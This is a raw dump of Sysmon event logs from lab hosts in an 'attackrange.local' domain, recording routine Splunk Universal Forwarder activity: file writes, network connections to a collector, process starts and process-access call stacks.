Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77FA1EB9F2DADB380BD2CD3119A4F728,SHA256=B0394093868EE6019087C9B3F30D304A85CDD7641EBD664703F9BF4649AE10F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102810Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:55.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B090D30B23C1D410AECF58852F689F30,SHA256=E568D7EDE97200D2A46187A7940F6F05DF18394EE16935D418B1F97A5DA821D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080725Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:51.667{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49979-false10.0.1.12-8000- 23542300x8000000000000000102812Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:56.736{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102811Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:56.595{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6882614047A9947CF6666E8AE7FDD96,SHA256=A2D3BC6142F056D9BBED8E8F410297527030E1843B4BD6C0F6EC4C62C1652CDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080726Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:56.027{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F06FE4B42766C97B709A37363A440D10,SHA256=DE7A9D61598416FCDE1BF8D9E20149327596CD08677FB9D96057E272946F69D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102814Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:57.595{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED7D470977AD1B750397AC7DC39DB558,SHA256=F2C7213A77C75B4014ADDE5739B868DFB07D7BD72D7A2E304EF233A1C99664A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080727Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:57.090{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5200D38F009F50C299E849C73B1A87C1,SHA256=31EEEE9F478AECE651364903E40845AA2272319A1E70A1C563F4F8E79F635F6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102813Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:56.421{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49470-false10.0.1.12-8000- 23542300x8000000000000000102816Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:58.595{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F13F8ECB26328B0ED4FC9FF5B1DBA26,SHA256=27041F9FB6382D88CDE54DCB4EA311AF4557C2ECA2F07217311EA0D59A4D28EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080728Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:58.137{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD058518222EDE4ECCCC14107EC8686C,SHA256=154F04EB3211488D45166D19E791ECE7716763B3DF7233F00107617FC8C1192A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102815Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:56.968{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49471-false10.0.1.12-8089- 10341000x8000000000000000102838Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.924{58E9C193-B173-615A-AF01-00000000FC01}66607100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102837Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B173-615A-AF01-00000000FC01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102836Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102835Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102834Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102833Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102832Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B173-615A-AF01-00000000FC01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102831Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.767{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B173-615A-AF01-00000000FC01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102830Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.768{58E9C193-B173-615A-AF01-00000000FC01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102829Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.595{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8559D3EB60A5FD57B2C13A3F8A673305,SHA256=EBBE6CF9A3FD3D1C819292C375682C409C327B59B61C911DB219F3991DDE913B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080743Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:56.814{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49980-false10.0.1.12-8000- 10341000x800000000000000080742Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B173-615A-2C01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080741Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080740Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080739Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080738Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080737Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080736Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080735Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080734Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080733Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080732Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B173-615A-2C01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080731Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.152{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B173-615A-2C01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 